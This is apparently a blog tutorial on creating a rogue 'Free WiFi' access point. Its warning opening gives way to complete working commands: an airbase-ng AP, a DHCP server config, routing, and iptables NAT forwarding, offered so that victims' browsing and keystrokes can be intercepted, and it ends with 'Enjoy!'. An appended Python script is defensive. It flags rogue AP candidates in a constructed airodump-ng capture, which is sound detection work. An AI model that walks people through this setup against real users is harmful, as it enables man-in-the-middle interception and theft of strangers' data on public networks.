Got free WiFi in the airport? At college? In motels? Or anywhere else?… Before connecting, we must make sure the access points are really broadcast by the companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with the airport/college/motel). Someone might have created a fake AP so they can track our browsing history and capture our keystrokes (for a MITM and a lot more). BEWARE!!! This is all about ROGUE Wireless Access Points.
Tools required:
apt-get: to get the new DHCP software
airmon-ng
airbase-ng: turns our Kali machine into an AP
dhcpd3: for adding DHCP server functionality
The fake AP process goes like this:
1) Someone connects to the fake AP that we created.
2) With DHCP, we provide a dynamically assigned IP address to them.
3) Similarly, we provide a default gateway and DNS.
Let’s begin….
Run:
apt-get update
apt-get upgrade
Let it finish, then run:
apt-get install dhcp3-server -y
(-y is simply yes for any prompts)
(Now, for safety, we move the default DHCP conf file to a backup, so that we can access it next time if needed.)
Run:
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
(In case the location above is wrong, search Google for the right location.)
We're now left with an empty conf file. We must put new settings in it, such as the gateway and DNS, to hand out to the user who connects to this fake AP.
Let's assume we use the following on our logical interface:
Network : 192.168.2.0/24
DNS : 8.8.8.8
Gateway : 192.168.2.1
These define the wireless network that the fake AP will serve.
Let's assume our own n/w is at 192.168.1.0/24.
When a user connects to the fake AP and wants to surf the internet, he first goes through the network specified above and then gets routed to the original destination via our n/w at 192.168.1.0/24.
Let's work in our text editor.
You can choose your favourite one. I'll use nano:
Run:
nano /etc/dhcp3/dhcpd.conf
You'll get a blank text editor for dhcpd.conf.
Now, write the following exactly:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
CTRL+X
Y
ENTER
Run:
airmon-ng start wlan0
airodump-ng mon0
Let's create a new ESSID "Free WiFi":
Run:
airbase-ng --essid "Free WiFi" -c 6 mon0
(The channel is 6, as seen after airodump-ng mon0, but it may differ in your case.)
Open a new tab, or clone the session. Run:
ifconfig at0 up
Next, let's assign the IP to at0. Run:
ifconfig at0 192.168.2.1/24
Let's add a route on the Kali machine via our assigned GW. Run:
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
Start the DHCP server service. Run:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
Run:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Finally, wait and watch in the previous tab to see if someone's associated with Free WiFi or not. Enjoy!
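From the other side of the table, here is one way to check a site survey for APs like the one above. This is an added example, not part of the original post: it reads the AP table of an airodump-ng CSV capture and flags a known ESSID sent from an unlisted BSSID, and open networks that are not in the inventory. The sample capture, the "Airport-WiFi" name, the MAC addresses and the AUTHORISED inventory are all constructed for illustration.

```python
import csv
import io

# Constructed sample in the layout of an airodump-ng CSV capture
# (AP table, blank line, then the station table). Not real data.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 1, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0, 12, Airport-WiFi,
02:11:22:33:44:55, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 6, 54, OPN, , , -30, 300, 0, 0.0.0.0, 12, Airport-WiFi,
02:11:22:33:44:66, 2024-01-01 10:02:00, 2024-01-01 10:05:00, 6, 54, OPN, , , -35, 280, 0, 0.0.0.0, 9, Free WiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Hypothetical inventory of the venue's own access points (assumption).
AUTHORISED = {"Airport-WiFi": {"bssids": {"AA:BB:CC:00:00:01"}, "privacy": "WPA2"}}

def parse_aps(text):
    """Return the access-point rows of an airodump-ng CSV as dicts."""
    aps, in_ap_table = [], False
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            if in_ap_table:
                break  # a blank line ends the AP table
            continue
        if row[0].strip() == "BSSID":
            in_ap_table = True  # header row of the AP table
        elif in_ap_table and len(row) >= 14:
            aps.append({"bssid": row[0].strip().upper(),
                        "privacy": row[5].strip(), "essid": row[13].strip()})
    return aps

def find_rogue_candidates(aps, authorised):
    """Flag known ESSIDs from unlisted BSSIDs, changed security, and unknown open APs."""
    findings = []
    for ap in aps:
        known = authorised.get(ap["essid"])
        if known is None:
            if ap["privacy"] == "OPN":
                findings.append((ap["bssid"], ap["essid"], "open network not in inventory"))
        elif ap["bssid"] not in known["bssids"]:
            findings.append((ap["bssid"], ap["essid"], "known ESSID from unlisted BSSID"))
        elif ap["privacy"] != known["privacy"]:
            findings.append((ap["bssid"], ap["essid"], "security differs from inventory"))
    return findings

if __name__ == "__main__":
    for finding in find_rogue_candidates(parse_aps(SAMPLE_CSV), AUTHORISED):
        print(*finding, sep=" | ")
```

A BSSID can be cloned as well, so an empty result narrows the search but does not prove every AP in range is legitimate.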